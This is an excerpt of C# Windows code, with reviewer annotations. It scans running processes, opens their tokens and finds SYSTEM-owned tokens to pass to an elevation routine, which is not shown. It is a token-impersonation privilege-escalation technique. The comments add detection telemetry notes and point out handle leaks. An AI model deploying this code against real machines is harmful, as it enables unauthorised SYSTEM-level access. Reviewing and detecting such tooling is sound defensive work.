        // Walks every running process looking for one whose primary token resolves to
        // the SYSTEM account, then hands that token to token_elevation (defined elsewhere
        // in the file). Returns true as soon as token_elevation succeeds for some process,
        // false if no process qualified or every attempt failed.
        // Detection note: the loop opens a handle to every process on the host from this
        // PID; process-access telemetry (EDR, Sysmon ProcessAccess) typically records one
        // event per target process for a burst like this.
        public static Boolean EnumerateUserProcesses()
        {
            Boolean rs = false;

            Process[] pids = Process.GetProcesses();
            Console.WriteLine("[*] Examining {0} processes", pids.Length);
            foreach (Process p in pids)
            {
                if (p.ProcessName.ToUpper().Equals("System".ToUpper()))         // skip the process named "System" (culture-sensitive compare; OrdinalIgnoreCase would be safer)
                {
                    continue;
                }
                // bInheritHandle is passed as true; nothing in this method needs the handle
                // inherited, so this looks unintentional — confirm against OpenProcess's declaration.
                IntPtr hProcess = OpenProcess(Flags.PROCESS_QUERY_INFORMATION, true, p.Id);
                if (IntPtr.Zero == hProcess)
                {
                    hProcess = OpenProcess(Flags.PROCESS_QUERY_LIMITED_INFORMATION, true, p.Id); //required for protected processes
                    if (IntPtr.Zero == hProcess)
                    {
                        continue;
                    }
                }
                IntPtr hToken;
                if (!OpenProcessToken(hProcess, Flags.MAXIMUM_ALLOWED, out hToken))
                {
                    // NOTE(review): hProcess is leaked on this path; CloseHandle is only reached below.
                    continue;
                }
                CloseHandle(hProcess);

                // The first call passes a zero-length buffer and is expected to fail while
                // filling dwLength with the required size; the retry reuses the same fixed-size
                // struct with that length.
                UInt32           dwLength        = 0;
                TOKEN_STATISTICS tokenStatistics = new TOKEN_STATISTICS();
                if (!GetTokenInformation(hToken, TOKEN_INFORMATION_CLASS.TokenStatistics, ref tokenStatistics, dwLength, out dwLength))
                {
                    if (!GetTokenInformation(hToken, TOKEN_INFORMATION_CLASS.TokenStatistics, ref tokenStatistics, dwLength, out dwLength))
                    {
                        // NOTE(review): hToken is never closed anywhere in this method (not on this
                        // path, not on the later continues, not after break) — one token handle is
                        // leaked per iteration unless token_elevation takes ownership of it.
                        continue;
                    }
                }

                String userName = String.Empty;
                if (!GetTokenInformationToUsername(tokenStatistics, ref userName))
                {
                    continue;
                }

                rs = token_elevation(hToken);
                if (rs)
                {
                    Console.WriteLine("模拟成功!PID:" + p.Id);   // message reads "impersonation succeeded! PID:"; runtime string left unchanged
                    break;
                }
            }
            return(rs);
        }
        // Resolves the account name behind a token's logon session and reports whether it
        // is SYSTEM. Only tokenStatistics.AuthenticationId is read. userName receives the
        // looked-up name (possibly empty) once execution reaches LookupAccountSid, even when
        // the method then returns false. Returns true only when the resolved name equals
        // "System" case-insensitively; false on any LSA or lookup failure.
        public static Boolean GetTokenInformationToUsername(TOKEN_STATISTICS tokenStatistics, ref String userName)
        {
            // NOTE(review): AllocHGlobal throws OutOfMemoryException rather than returning zero,
            // and the IntPtr.Zero check below runs only after the pointer has already been written
            // to. The buffer is never released with Marshal.FreeHGlobal on any path.
            IntPtr lpLuid = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(_LUID)));

            Marshal.StructureToPtr(tokenStatistics.AuthenticationId, lpLuid, false);
            if (IntPtr.Zero == lpLuid)
            {
                return(false);
            }

            IntPtr ppLogonSessionData = new IntPtr();

            // LsaGetLogonSessionData returns an NTSTATUS; anything non-zero is treated as failure.
            if (0 != LsaGetLogonSessionData(lpLuid, out ppLogonSessionData))
            {
                return(false);
            }

            if (IntPtr.Zero == ppLogonSessionData)
            {
                return(false);
            }

            // NOTE(review): the LSA-allocated block is never handed back via LsaFreeReturnBuffer.
            SECURITY_LOGON_SESSION_DATA securityLogonSessionData = (SECURITY_LOGON_SESSION_DATA)Marshal.PtrToStructure(ppLogonSessionData, typeof(SECURITY_LOGON_SESSION_DATA));

            if (IntPtr.Zero == securityLogonSessionData.Sid || IntPtr.Zero == securityLogonSessionData.UserName.Buffer || IntPtr.Zero == securityLogonSessionData.LogonDomain.Buffer)
            {
                return(false);
            }
            // Both StringBuilders start at the default capacity (16 chars) and the return value of
            // LookupAccountSid is not checked, so an account or domain name that does not fit
            // presumably fails the lookup silently and leaves userName empty, which then fails the
            // SYSTEM test below rather than raising an error.
            StringBuilder lpName  = new StringBuilder();
            UInt32        cchName = (UInt32)lpName.Capacity;
            StringBuilder lpReferencedDomainName  = new StringBuilder();
            UInt32        cchReferencedDomainName = (UInt32)lpReferencedDomainName.Capacity;
            SID_NAME_USE  sidNameUse = new SID_NAME_USE();

            LookupAccountSid(String.Empty, securityLogonSessionData.Sid, lpName, ref cchName, lpReferencedDomainName, ref cchReferencedDomainName, out sidNameUse);

            userName = lpName.ToString();
            if (!userName.ToUpper().Equals("System".ToUpper()))   // culture-sensitive compare; OrdinalIgnoreCase is the safer choice for account names
            {
                return(false);
            }
            return(true);
        }
 // P/Invoke declaration for the Win32 GetTokenInformation API, specialised to the
 // TokenStatistics class: TokenInformation is a TOKEN_STATISTICS struct passed by
 // reference instead of a raw buffer, so this overload only suits fixed-size
 // information classes. ReturnLength receives the size required or written.
 // The [DllImport] attribute that binds this declaration is not shown in this excerpt.
 public static extern Boolean GetTokenInformation(IntPtr TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, ref TOKEN_STATISTICS TokenInformation, UInt32 TokenInformationLength, out UInt32 ReturnLength);